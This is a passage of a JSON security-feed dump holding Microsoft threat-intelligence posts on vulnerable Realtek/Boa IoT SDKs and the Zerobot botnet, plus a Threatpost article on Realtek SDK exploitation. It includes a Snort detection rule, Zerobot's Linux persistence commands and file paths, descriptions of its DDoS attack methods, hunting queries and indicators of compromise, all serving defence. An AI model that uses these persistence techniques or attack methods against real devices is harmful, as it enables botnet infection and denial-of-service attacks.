assessments, which identifies unpatched devices in the organizational network and set workflows for initiating appropriate patch processes with solutions like [Microsoft Defender Vulnerability Management](<https://learn.microsoft.com/microsoft-365/security/defender-vulnerability-management/defender-vulnerability-management>) and [Microsoft Defender for Endpoint](<https://www.microsoft.com/security/business/endpoint-security/microsoft-defender-endpoint?rtc=1>) with [Microsoft Defender for IoT ](<https://learn.microsoft.com/microsoft-365/security/defender-endpoint/enable-microsoft-defender-for-iot-integration>).\n * **Extend vulnerability and risk detection beyond the firewall** with platforms like [Microsoft Defender External Attack Surface Management](<https://learn.microsoft.com/azure/external-attack-surface-management/>). Customers can identify internet-exposed infrastructure running Boa web server components in their inventory and use the insights tile under the Attack Surface Summary dashboard to surface assets vulnerable to CVE-2009-4496. The insight can be found under High Severity Observations.\n * **Reduce the attack surface** by eliminating unnecessary internet connections to IoT devices in the network. Apply network segmentation to prevent an attacker from moving laterally and compromising assets after intrusion. IoT and critical device networks should be isolated with firewalls.\n * **Use proactive antivirus scanning** to identify malicious payloads on devices.\n * **Configure detection rules to identify malicious activity **whenever possible. Security personnel can use our snort rule below to configure security solutions to detect CVE-2022-27255 on assets using the RealTek SDK.\n \n \n alert udp any any -> any any (msg:\"Realtek eCOS SDK SIP Traffic Exploit CVE-2022-27255\"; content: \"invite\"; depth: 6; nocase; content: \"sip:\"; content: \"m=audio \"; isdataat: 128,relative; content:!\"|0d|\"; within: 128;sid:20221031;)\n\n * **Adopt a comprehensive IoT and OT solution** like [Microsoft Defender for IoT](<https://www.microsoft.com/security/business/endpoint-security/microsoft-defender-iot>) to monitor devices, respond to threats, and increase visibility in order to detect and alert when IoT devices with Boa are used as an entry point to a network and protect critical infrastructure. \n\n_**_**Adam Castleman, Jordan Herman**_**_, Microsoft Defender Threat Intelligence_ \n**_**Rotem Sde Or, Ilana Sivan, Gil Regev**_**_, Microsoft Defender for IoT Research Team_ \n**_**Ross Bevington**_**_, Microsoft Threat Intelligence Center__\n\nThe post [Vulnerable SDK components lead to supply chain risks in IoT and OT environments](<https://www.microsoft.com/en-us/security/blog/2022/11/22/vulnerable-sdk-components-lead-to-supply-chain-risks-in-iot-and-ot-environments/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/en-us/security/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-11-22T17:00:00", "type": "mssecure", "title": "Vulnerable SDK components lead to supply chain risks in IoT and OT environments", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-4496", "CVE-2021-35395", "CVE-2021-44228", "CVE-2022-27255"], "modified": "2022-11-22T17:00:00", "id": "MSSECURE:567C6CC66BD942B4F1BBE84ED9F6665B", "href": "https://www.microsoft.com/en-us/security/blog/2022/11/22/vulnerable-sdk-components-lead-to-supply-chain-risks-in-iot-and-ot-environments/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-12-21T20:16:24", "description": "Botnet malware operations are a constantly evolving threat to devices and networks. Threat actors target Internet of Things (IoT) devices for recruitment into malicious operations as IoT devices\u2019 configurations often leave them exposed, and the number of internet-connected devices continue to grow. Recent trends have shown that operators are redeploying malware for a variety of distributions and objectives, modifying existing botnets to scale operations and add as many devices as possible to their infrastructure.\n\nZerobot, a Go-based botnet that spreads primarily through IoT and web application vulnerabilities, is an example of an evolving threat, with operators continuously adding new exploits and capabilities to the malware. The Microsoft Defender for IoT research team has been monitoring Zerobot (also called ZeroStresser by its operators) for months. Zerobot is offered as part of a malware as a service scheme and has been updated several times since Microsoft started to track it. One domain with links to Zerobot was among several domains associated with DDoS-for-hire services [seized by the FBI](<https://www.justice.gov/usao-cdca/pr/federal-prosecutors-los-angeles-and-alaska-charge-6-defendants-operating-websites>) in December 2022.\n\nMicrosoft has previously reported on the [evolving threat ecosystem](<https://www.microsoft.com/en-us/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/>). The shift toward malware as a service in the cyber economy has industrialized attacks and has made it easier for attackers to purchase and use malware, establish and maintain access to compromised networks, and utilize ready-made tools to perform their attacks. We have tracked advertisements for the Zerobot botnet on various social media networks in addition to other announcements regarding the sale and maintenance of the malware, as well as new capabilities in development.\n\nIn this blog post, we present information about the latest version of the malware, Zerobot 1.1, including newly identified capabilities and further context to Fortinet\u2019s recent [analysis](<https://www.fortinet.com/blog/threat-research/zerobot-new-go-based-botnet-campaign-targets-multiple-vulnerabilities>) on the threat. Zerobot 1.1 increases its capabilities with the inclusion of new attack methods and new exploits for supported architectures, expanding the malware\u2019s reach to different types of devices. In addition to these findings, we\u2019re sharing new indicators of compromise (IOCs) and recommendations to help defenders protect devices and networks against this threat.\n\n## What is Zerobot?\n\nZerobot affects a variety of devices that include firewall devices, routers, and cameras, adding compromised devices to a distributed denial of service (DDoS) botnet. Using several modules, the malware can infect vulnerable devices built on diverse architectures and operating systems, find additional devices to infect, achieve persistence, and attack a range of protocols. Microsoft tracks this activity as DEV-1061.\n\nThe most recent distribution of Zerobot includes additional capabilities, such as exploiting vulnerabilities in Apache and Apache Spark (CVE-2021-42013 and CVE-2022-33891 respectively), and new DDoS attack capabilities.\n\nMicrosoft uses DEV-#### designations as a temporary name given to an unknown, emerging, or developing cluster of threat activity, allowing Microsoft to track it as a unique set of information until we can reach high confidence about the origin or identity of the actor behind the activity. Once it meets defined criteria, a DEV group is converted to a named actor.\n\n## How Zerobot gains and maintains device access\n\nIoT devices are often internet-exposed, leaving unpatched and improperly secured devices vulnerable to exploitation by threat actors. Zerobot is capable of propagating through brute force attacks on vulnerable devices with insecure configurations that use default or weak credentials. The malware may attempt to gain device access by using a combination of eight common usernames and 130 passwords for IoT devices over SSH and telnet on ports 23 and 2323 to spread to devices. Microsoft researchers identified numerous SSH and telnet connection attempts on default ports 22 and 23, as well as attempts to open ports and connect to them by port-knocking on ports 80, 8080, 8888, and 2323.\n\nIn addition to brute force attempts on devices, Zerobot exploits dozens of vulnerabilities, which malware operators add on a rolling basis to gain access and inject malicious payloads. Zerobot 1.1 includes several new vulnerabilities, such as:\n\n**Vulnerability**| **Affected software** \n---|--- \nCVE-2017-17105| Zivif PR115-204-P-RS \nCVE-2019-10655| Grandstream \nCVE-2020-25223| WebAdmin of Sophos SG UTM \nCVE-2021-42013| Apache \nCVE-2022-31137| Roxy-WI \nCVE-2022-33891| Apache Spark \nZSL-2022-5717| MiniDVBLinux \n \nSince the release of Zerobot 1.1, the malware operators have removed CVE-2018-12613, a phpMyAdmin vulnerability that could allow threat actors to view or execute files. Microsoft researchers have also identified that previous reports have used the vulnerability ID \u201cZERO-32906\u201d for CVE-2018-20057, \u201cGPON\u201d for CVE-2018-10561, and \u201cDLINK\u201d for CVE-2016-20017; and that CVE-2020-7209 was mislabeled as CVE-2017-17106 and CVE-2022-42013 was mislabeled as CVE-2021-42013.\n\nMicrosoft researchers have also found new evidence that Zerobot propagates by compromising devices with known vulnerabilities that are not included in the malware binary, such as CVE-2022-30023, a command injection vulnerability in Tenda GPON AC1200 routers.\n\nUpon gaining device access, Zerobot injects a malicious payload, which may be a generic script called _zero.sh _that downloads and attempts to execute Zerobot, or a script that downloads the Zerobot binary of a specific architecture. The bash script that attempts to download different Zerobot binaries tries to identify the architecture by brute-force, attempting to download and execute binaries of various architectures until it succeeds, as IoT devices are based on many computer processing units (CPUs). Microsoft has observed scripts targeting various architectures including ARM64, MIPS, and x86_64.\n\nDepending on the operating system of the device, the malware has different persistence mechanisms. Persistence tactics are used by malware operators to obtain and maintain access to devices. While Zerobot is unable to spread to Windows machines, we have found several samples that can run on Windows. On Windows machines, the malware copies itself to the Startup folder with the file name _FireWall.exe_ (older versions use _my.exe)_. Microsoft Defender for Endpoint detects this malware and related malicious activity on both Windows and Linux devices. See detection details below.\n\nTo achieve persistence on Linux-based devices, Zerobot uses a combination of desktop entry, daemon, and service methods:\n\n**Desktop entry:**\n\nZerobot copies itself to _$HOME/.config/ssh.service/sshf_ then writes a desktop entry file called _sshf.desktop_ to the same directory. Older Linux versions use _$HOME/.config/autostart_ instead of _$HOME/.config/ssh.service_.\n\n**Daemon:**\n\nCopies itself to _/usr/bin/sshf_ and writes a configuration at _/etc/init/sshf.conf_.\n\n**Service:**\n\nCopies itself to _/etc/sshf_ and writes a service configuration at _/lib/system/system/sshf.service_, then enables the service (to make sure it starts at boot) with two commands:\n\n * _systemctl enable sshf_\n * _service enable sshf_\n\nAll persistence mechanisms on older Linux versions use _my.bin_ and _my.bin.desktop_ instead of _sshf_ and _sshf.desktop._\n\n## New attack capabilities\n\nIn addition to the functions and attacks included in previous versions of the malware, Zerobot 1.1 has additional DDoS attack capabilities. These functions allow threat actors to target resources and make them inaccessible. Successful DDoS attacks may be used by threat actors to extort ransom payments, distract from other malicious activities, or disrupt operations. In almost every attack, the destination port is customizable, and threat actors who purchase the malware can modify the attack according to their target.\n\nThe following are the previously known Zerobot capabilities:\n\n**Attack method**| **Description** \n---|--- \nUDP_LEGIT| Sends UDP packets without data. \nMC_PING| Meant for DDoS on Minecraft servers. Sends a handshake and status request. \nTCP_HANDSHAKE| Floods with TCP handshakes. \nTCP_SOCKET| Continuously sends random payloads on an open TCP socket. Payload length is customizable. \nTLS_SOCKET| Continuously sends random payloads on an open TLS socket. Payload length is customizable. \nHTTP_HANDLE| Sends HTTP GET requests using a Golang standard library. \nHTTP_RAW| Formats and sends HTTP GET requests. \nHTTP_BYPASS| Sends HTTP GET requests with spoofed headers. \nHTTP_NULL| HTTP headers are each one random byte (not necessarily ascii). \n \nPreviously undisclosed and new capabilities are the following:\n\n**Attack method**| **Description** \n---|--- \nUDP_RAW| Sends UDP packets where the payload is customizable. \nICMP_FLOOD| Supposed to be an ICMP flood, but the packet is built incorrectly. \nTCP_CUSTOM| Sends TCP packets where the payload and flags are fully customizable. \nTCP_SYN| Sends SYN packets. \nTCP_ACK| Sends ACK packets. \nTCP_SYNACK| Sends SYN-ACK packets. \nTCP_XMAS| Christmas tree attack (all TCP flags are set). The reset cause field is \u201cxmas\u201d. \n \n## How Zerobot spreads\n\nAfter persistence is achieved, Zerobot scans for other internet-exposed devices to infect. The malware randomly generates a number between 0 and 255 and scans all IPs starting with this value. Using a function called _new_botnet_selfRepo_isHoneypot_, the malware tries to identify honeypot IP addresses, which are used by network decoys to attract cyberattacks and collect information on threats and attempts to access resources. This function includes 61 IP subnets, preventing scanning of these IPs.\n\nMicrosoft researchers also identified a sample that can run on Windows based on a cross-platform (Linux, Windows, macOS) open-source remote administration tool (RAT) with various features such as managing processes, file operations, screenshotting, and running commands. This tool was found by investigating the command-and-control (C2) IPs used by the malware. The script, which is used to download this RAT, is called _impst.sh_:\n\nFigure 1. The _impst.sh_ script used to download the remote administration tool\n\n## Defending devices and networks against Zerobot\n\nThe continuous evolution and rapid addition of new capabilities in the latest Zerobot version underscores the urgency of implementing comprehensive security measures. Microsoft recommends the following steps to protect devices and networks against the threat of Zerobot:\n\n * Use security solutions with cross-domain visibility and detection capabilities like [Microsoft 365 Defender](<https://www.microsoft.com/security/business/threat-protection/microsoft-365-defender>), which provides integrated defense across endpoints, identities, email, applications, and data. Microsoft Defender Antivirus and Microsoft Defender for Endpoint detect Zerobot malware variants and malicious behavior related to this threat.\n * Adopt a comprehensive IoT security solution such as [Microsoft Defender for IoT](<https://www.microsoft.com/security/business/endpoint-security/microsoft-defender-iot>) to allow visibility and monitoring of all IoT and OT devices, threat detection and response, and integration with SIEM/SOAR and XDR platforms such as Microsoft Sentinel and Microsoft 365 Defender.\n * Ensure secure configurations for devices: Change the default password to a strong one, and block SSH from external access.\n * Maintain device health with updates: Make sure devices are up to date with the latest firmware and patches.\n * Use least privileges access: Use a secure virtual private network (VPN) service for remote access and restrict remote access to the device.\n * Harden endpoints with a comprehensive Windows security solution:\n * Manage the apps your employees can use through Windows Defender Application Control and for unmanaged solutions, enabling Smart App Control.\n * Perform timely cleanup of all unused and stale executables sitting on yours or your organizations\u2019 devices.\n\n## Detections\n\n**Microsoft Defender for IoT**\n\nMicrosoft Defender for IoT uses detection rules and signatures to identify malicious behavior. Microsoft Defender for IoT has alerts for the following vulnerabilities and exploits which may be tied to Zerobot activity:\n\n * CVE-2014-8361\n * CVE-2016-20017\n * CVE-2017-17105\n * CVE-2017-17215\n * CVE-2018-10561\n * CVE-2018-20057\n * CVE-2019-10655\n * CVE-2020-7209\n * CVE-2020-10987\n * CVE-2020-25506\n * CVE-2021-35395\n * CVE-2021-36260\n * CVE-2021-42013\n * CVE-2021-46422\n * CVE-2022-22965\n * CVE-2022-25075\n * CVE-2022-26186\n * CVE-2022-26210\n * CVE-2022-30023\n * CVE-2022-30525\n * CVE-2022-31137\n * CVE-2022-33891\n * CVE-2022-34538\n * CVE-2022-37061\n * ZERO-36290\n * ZSL-2022-5717\n\n**Microsoft Defender Antivirus**\n\nMicrosoft Defender Antivirus detects the malicious files under the following platforms and threat names:\n\n * Zerobot (Win32/64 and Linux)\n * SparkRat (Win32/64 and Linux)\n\n**Microsoft Defender for Endpoint**\n\nMicrosoft Defender for Endpoint alerts with the following titles can indicate threat activity on your network:\n\n * DEV-1061 threat activity group detected\n * An active 'PrivateLoader' malware process was detected while executing\n * 'Morila' malware was prevented\n * 'Multiverze' malware was detected\n\nMicrosoft Defender for Endpoint also has detections for the following vulnerabilities exploited by Zerobot:\n\n * CVE-2022-22965 (Spring4Shell)\n\nMicrosoft Defender for Endpoint's Device Discovery capabilities discover and classify devices. With these capabilities, Microsoft 365 Defender customers using Microsoft Defender for IoT have visibility into security recommendations for devices with the following vulnerabilities:\n\n * CVE-2014-8361\n * CVE-2019-10655\n * CVE-2020-25506\n * CVE-2021-36260\n * CVE-2021-42013\n * CVE-2022-30525\n * CVE-2022-31137\n * CVE-2022-37061\n\nDevices with these vulnerabilities are also visible in the Microsoft Defender Vulnerability Management inventory.\n\n**Microsoft Defender for Cloud**\n\nMicrosoft Defender for Cloud alerts with the following titles can indicate threat activity on your network:\n\n * VM_ReverseShell\n * VM_SuspectDownloadArtifacts\n * SQL.VM_ShellExternalSourceAnomaly\n * AppServices_CurlToDisk\n\n## Advanced hunting queries\n\n### **Microsoft 365 Defender**\n\nMicrosoft 365 Defender customers can run the following query to find related activity in their networks.\n\n**Zerobot files**\n\nThis query finds the file hashes associated with Zerobot activity.\n \n \n let IoCList = externaldata(TimeGenerated:datetime,IoC:string,IoC_Type:string,ExpirationDateTime:datetime,Description:string, Action:string, ConfidenceScore:real, ThreatType:string, Active:string,Type:string, TrafficLightProtocolLevel:string, \n ActivityGroupNames:string)[@\"https://raw.githubusercontent.com/microsoft/mstic/master/RapidReleaseTI/Indicators.csv\"] \n with(format=\"csv\", ignoreFirstRecord=True);\n let shahashes = IoCList\n | where IoC_Type =~ \"sha256\" and Description =~ \"Dev-1061 Zerobot affecting IoT devices\"\n | distinct IoC;\n DeviceFileEvents\n | where SHA256 in (shahashes)\n\n**Zerobot HTTP requests**\n\nThis query finds suspicious HTTP requests originated by the IOCs associated with Zerobot activity.\n \n \n DeviceNetworkEvents\n | where RemoteIP in(\"176.65.137.5\",\"176.65.137.6\")\n | where ActionType == \"NetworkSignatureInspected\"\n | where Timestamp > ago(30d)\n |extend json = parse_json(AdditionalFields)\n | extend SignatureName =tostring(json.SignatureName), SignatureMatchedContent = tostring(json.SignatureMatchedContent), SignatureSampleContent = tostring(json.SamplePacketContent)\n |where SignatureName == \"HTTP_Client\"\n |project Timestamp, DeviceId, DeviceName, RemoteIP, RemotePort, LocalIP, LocalPort, SignatureName, SignatureMatchedContent, SignatureSampleContent\n \n\n**Zerobot port knocking**\n\nThis query finds incoming connections from IOCs associated with Zerobot activity.\n \n \n DeviceNetworkEvents\n | where RemoteIP in(\"176.65.137.5\",\"176.65.137.6\")\n | where ActionType == \"InboundConnectionAccepted\"\n | where Timestamp > ago(30d)\n |project Timestamp, DeviceId, DeviceName, RemoteIP, RemotePort, LocalIP, LocalPort, InitiatingProcessFileName\n \n\n### **Microsoft Sentinel**\n\nMicrosoft Sentinel customers can use the TI Mapping analytics (a series of analytics all prefixed with \u2018TI map\u2019) to automatically match the malicious domain indicators mentioned in this blog post with data in their workspace. If the TI Map analytics are not currently deployed, customers can install the Threat Intelligence solution from the Microsoft Sentinel Content Hub to have the analytics rule deployed in their Sentinel workspace. More details on the Content Hub can be found here: <https://learn.microsoft.com/azure/sentinel/sentinel-solutions-deploy>\n\n## Indicators of compromise (IOCs):\n\n**Domains and IP addresses:**\n\n * zero[.]sudolite[.]ml\n * 176.65.137[.]5\n * 176.65.137[.]5:1401\n * 176.65.137[.]6\n * ws[:]//176.65.137[.]5/handle\n * http[:]//176.65.137[.]5:8000/ws\n\n**New Zerobot hashes (SHA-256)**\n\n * aed95a8f5822e9b1cd1239abbad29d3c202567afafcf00f85a65df4a365bedbb\n * bf582b5d470106521a8e7167a5732f7e3a4330d604de969eb8461cbbbbdd9b9a\n * 0a5eebf19ccfe92a2216c492d6929f9cac72ef37089390572d4e21d0932972c8\n * 1e7ca210ff7bedeefadb15a9ec5ea68ad9022d0c6f41c4e548ec2e5927026ba4\n * 05b7517cb05fe1124dd0fad4e85ddf0fe65766a4c6c9986806ae98a427544e9d\n * 5625d41f239e2827eb05bfafde267109549894f0523452f7a306b53b90e847f2\n * c304a9156a032fd451bff49d75b0e9334895604549ab6efaab046c5c6461c8b3\n * 66c76cfc64b7a5a06b6a26976c88e24e0518be3554b5ae9e3475c763b8121792\n * 539640a482aaee2fe743502dc59043f11aa8728ce0586c800193e30806b2d0e5\n * 0f0ba8cc3e46fff0eef68ab5f8d3010241e2eea7ee795e161f05d32a0bf13553\n * 343c9ca3787bf763a70ed892dfa139ba69141b61c561c128084b22c16829c5af\n * 874b0691378091a30d1b06f2e9756fc7326d289b03406023640c978ff7c87712\n * 29eface0054da4cd91c72a0b2d3cda61a02831b4c273e946d7e106254a6225a7\n * 4a4cb8516629c781d5557177d48172f4a7443ca1f826ea2e1aa6132e738e6db2\n * bdfd89bdf6bc2de5655c3fe5f6f4435ec4ad37262e3cc72d8cb5204e1273ccd6\n * 62f23fea8052085d153ac7b26dcf0a15fad0c27621f543cf910e37f8bf822e0e\n * 788e15fd87c45d38629e3e715b0cb93e55944f7c4d59da2e480ffadb6b981571\n * 26e68684f5b76d9016d4f02b8255ff52d1b344416ffc19a2f5c793ff1c2fdc65\n * e4840c5ac2c2c2170d00feadb5489c91c2943b2aa13bbec00dbcffc4ba8dcc2d\n * 45059f26e32da95f4bb5dababae969e7fceb462cdeadf7d141c39514636b905a\n * 77dd28a11e3e4260b9a9b60d58cb6aaaf2147da28015508afbaeda84c1acfe70\n * cf232e7d39094c9ba04b9713f48b443e9d136179add674d62f16371bf40cf8c8\n * 13657b64a2ac62f9d68aeb75737cca8f2ab9f21e4c38ce04542b177cb3a85521\n * eb33c98add35f6717a3afb0ab2f9c0ee30c6f4e0576046be9bf4fbf9c5369f71\n * e3dd20829a34caab7f1285b730e2bb0c84c90ac1027bd8e9090da2561a61ab17\n * 3685d000f6a884ca06f66a3e47340e18ff36c16b1badb80143f99f10b8a33768\n * cdc28e7682f9951cbe2e55dad8bc2015c1591f89310d8548c0b7a1c65dbefae3\n * 869f4fb3f185b2d1231d9378273271ddfeebb53085daede89989f9cc8d364f5f\n * 6c59af3ed1a616c238ee727f6ed59e962db70bc5a418b20b24909867eb00a9d6\n * ef28ee3301e97eefd2568a3cb4b0f737c5f31983710c75b70d960757f2def74e\n * 95e4cc13f8388c195a1220cd44d26fcb2e10b7b8bfc3d69efbc51beb46176ff1\n * 62f9eae8a87f64424df90c87dd34401fe7724c87a394d1ba842576835ab48afc\n * 54d1daf58ecd4d8314b791a79eda2258a69d7c69a5642b7f5e15f2210958bdce\n * 8176991f355db10b32b7562d1d4f7758a23c7e49ed83984b86930b94ccc46ab3\n * 8aa89a428391683163f0074a8477d554d6c54cab1725909c52c41db2942ac60f\n * fd65bd8ce671a352177742616b5facc77194cccec7555a2f90ff61bad4a7a0f6\n * 1e66ee40129deccdb6838c2f662ce33147ad36b1e942ea748504be14bb1ee0ef\n * 57f83ca864a2010d8d5376c68dc103405330971ade26ac920d6c6a12ea728d3d\n * 7bfd0054aeb8332de290c01f38b4b3c6f0826cf63eef99ddcd1a593f789929d6\n\n****SparkRat** hashes (SHA-256): **\n\n * 0ce7bc2b72286f236c570b1eb1c1eacf01c383c23ad76fd8ca51b8bc123be340\n * cacb77006b0188d042ce95e0b4d46f88828694f3bf4396e61ae7c24c2381c9bf\n * 65232e30bb8459961a6ab2e9af499795941c3d06fdd451bdb83206a00b1b2b88\n\n_**Rotem Sde-Or**, **Ilana Sivan**, **Gil Regev**, Microsoft Defender for IoT Research Team \n**Meitar Pinto**, **Nimrod Roimy**, **Nir Avnery**, Microsoft Defender Research Team \n**Ramin Nafisi**, **Ross Bevington**, Microsoft Threat Intelligence Center (MSTIC)_\n\nThe post [Microsoft research uncovers new Zerobot capabilities](<https://www.microsoft.com/en-us/security/blog/2022/12/21/microsoft-research-uncovers-new-zerobot-capabilities/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/en-us/security/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-12-21T20:00:00", "type": "mssecure", "title": "Microsoft research uncovers new Zerobot capabilities", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-8361", "CVE-2016-20017", "CVE-2017-17105", "CVE-2017-17106", "CVE-2017-17215", "CVE-2018-10561", "CVE-2018-12613", "CVE-2018-20057", "CVE-2019-10655", "CVE-2020-10987", "CVE-2020-25223", "CVE-2020-25506", "CVE-2020-7209", "CVE-2021-35395", "CVE-2021-36260", "CVE-2021-42013", "CVE-2021-46422", "CVE-2022-22965", "CVE-2022-25075", "CVE-2022-26186", "CVE-2022-26210", "CVE-2022-30023", "CVE-2022-30525", "CVE-2022-31137", "CVE-2022-33891", "CVE-2022-34538", "CVE-2022-37061", "CVE-2022-42013"], "modified": "2022-12-21T20:00:00", "id": "MSSECURE:0FBB61490D4A94C83AEE14DDEE722297", "href": "https://www.microsoft.com/en-us/security/blog/2022/12/21/microsoft-research-uncovers-new-zerobot-capabilities/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2021-08-24T02:09:46", "description": "Threat actors zeroing in on command injection vulnerabilities reported in Realtek chipsets just days after multiple flaws were discovered in the software developers kits (SDK) deployed across at least 65 separate vendors.\n\nOn Aug. 16 multiple [Realtek vulnerabilities](<https://www.iot-inspector.com/blog/advisory-multiple-issues-realtek-sdk-iot-supply-chain/>) were disclosed by IoT Inspector Research Lab. It took about 48 hours for attackers to start trying to exploit them. SAM Seamless Network reported two days after the bugs were made public, attackers made \u201cmultiple\u201d attempts breach the company\u2019s Secure Home product to [spread a new version of Mirai malware](<https://securingsam.com/realtek-vulnerabilities-weaponized/>).\n\n\u201cSpecifically, we noticed exploit attempts to \u2018formWsc\u2019 and \u2018formSysCmd\u2019 web pages,\u201d SAM\u2019s report on the incident said. \u201cThe exploit attempts to deploy a Mirai variant detected in March by Palo Alto Networks. Mirai is a notorious IoT and router malware circulating in various forms for the last 5 years. It was originally used to shut down large swaths of the internet but has since evolved into many variants for different purposes.\u201d \n[](<https://threatpost.com/infosec-insider-subscription-page/?utm_source=ART&utm_medium=ART&utm_campaign=InfosecInsiders_Newsletter_Promo/>)The report goes on to link another similar attack to the attack group. On Aug. 6 Juniper Networks found a vulnerability that just two days later was also exploited to try and deliver the same Mirai botnet using the same network subnet, the report explained.\n\n\u201cThis chain of events shows that hackers are actively looking for command injection vulnerabilities and use them to propagate widely used malware quickly,\u201d SAM said. \u201cThese kinds of vulnerabilities are easy to exploit and can be integrated quickly into existing hacking frameworks that attackers employ, well before devices are patched and security vendors can react.\u201d\n\nRealtek Semiconductor Corp. has not yet responded to Threatpost\u2019s request for comment, but the company did release [this advisory](<https://www.realtek.com/images/safe-report/Realtek_APRouter_SDK_Advisory-CVE-2021-35392_35395.pdf>) on CVE-2021-35392, CVE-2021-35393, CVE-2021-35394, CVE-2021-35395,\n\n[Mirai\u2019s source code has exploded in popularity](<https://threatpost.com/mirai-botnet-sees-big-2019-growth-shifts-focus-to-enterprises/146547/>) over the years, with more than [60 variants](<https://threatpost.com/mirai-variant-sonicwall-d-link-iot/164811/>) observed in the wild by last March. That number is still climbing with this latest iteration tailored to target the Realtek SDK flaws.\n\n## **Devices Targeted **\n\nConsidering the number of vendors impacted, researchers are concerned threat actors have ample first-move opportunities to exploit the bug before patches are deployed.\n\nSAM said the devices most exposed to the Realtek SDK bug are:\n\n * Netis E1+ extender\n * Edimax N150 and N300 Wi-Fo router\n * Repotec RP-WR5444 router\n\nThe original IoT Inspector report linked this kind of vulnerability to recent supply chain attacks on [SolarWinds](<https://threatpost.com/solarwinds-attackers-dhs-emails/165110/>) and [Kaseya](<https://threatpost.com/kaseya-patches-zero-day-exploits/167548/>).\n\n\u201cAs awareness for supply chain transparency is on the rise among security experts, this example is a pretty good showcase of the vast implications of an obscure IoT supply chain, The IoT Inspector report said.\n\nJust a day after the Realtek revelations, Mandiant in coordination with the Cybersecurity and Infrastructure Security Agency (CISA), reported [a flaw in IoT cloud](<https://threatpost.com/bug-iot-millions-devices-attackers-eavesdrop/168729/>) platform ThroughTek Kalay. The vulnerability would have potentially allowed an attacker to take over an IoT device to listen to live audio, watch real-time video and more.\n\n\u201cThese types of vulnerabilities are surfacing every day and there are probably many more that have yet to be discovered\u2026,\u201d SAM\u2019s Ran Hananel told Threatpost by email.\n\n## **Securing IoT **\n\nYaniv Bar-Dayan, co-founder of Vulcan Cyber told Threatpost that IoT security in inherently tricky because often it\u2019s not clear who is responsible for the data.\n\n\u201cWhile the responsibility to bring bug fixes and patches to market should lie on the shoulders of vendors, users should be sure to rely on tried-and-true security best practices in the meantime,\u201d Bar-Dayan said. \u201cEncrypt data, use sophisticated and unique passwords or multi-factor authentication, don\u2019t broadcast your network ID, double check configurations, and, above all else, patch early and often.\u201d\n\nBesides patching, Jake Williams at BreachQuest recommends limiting web interface access to the local network.\n\n\u201cThat won\u2019t stop attacks but does limit where they can be conducted from,\u201d Williams said. \u201cThis is particularly true for administrative interfaces.\u201d\n\nIt\u2019s also up to developers to know the code their using is secure. A [Software Bill of Materials (SBOMs)](<https://threatpost.com/executive-order-cybersecurity-federal-agencies/165056/>) are one solution being pushed by the U.S. government in the wake of the SolarWinds breach.\n\n\u201cDevelopers of any type of software like to use SDKs because it enables them to implement capabilities into their software without having to build it themselves,\u201d Hank Schless from Lookout told Threatpost. \u201cThis is broadly practiced, and there\u2019s a level of implicit trust that developers have in those that build these SDKs that everything packaged inside of them will be safe. However, just like with any other type of software, SDKs have their inevitable flaws.\u201d\n", "cvss3": {}, "published": "2021-08-23T14:08:42", "type": "threatpost", "title": "Attackers Actively Exploiting Realtek SDK Flaws", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-35392", "CVE-2021-35393", "CVE-2021-35394", "CVE-2021-35395"], "modified": "2021-08-23T14:08:42", "id": "THREATPOST:3CDCE42FF7DD2A68B77DC15C8BB1A6BA", "href": "https://threatpost.com/attackers-exploiting-realtek/168856/", "cvss": {"score": 0.0, "vector": "NONE"}}], "mmpc": [{"lastseen": "2022-12-08T23:19:41", "description": "> **December 8, 2022 update** - Reflected additional research on Boa-related CVEs and updated supply chain diagram.\n\nVulnerabilities in network components, architecture files, and developer tools have become increasingly popular attack vectors to gain access into secure networks and devices. External tools and products that are managed by vendors and developers can pose a security risk, especially to targets in sensitive industries. Attacks on software and hardware supply chains, like [Log4J](<https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/>) and 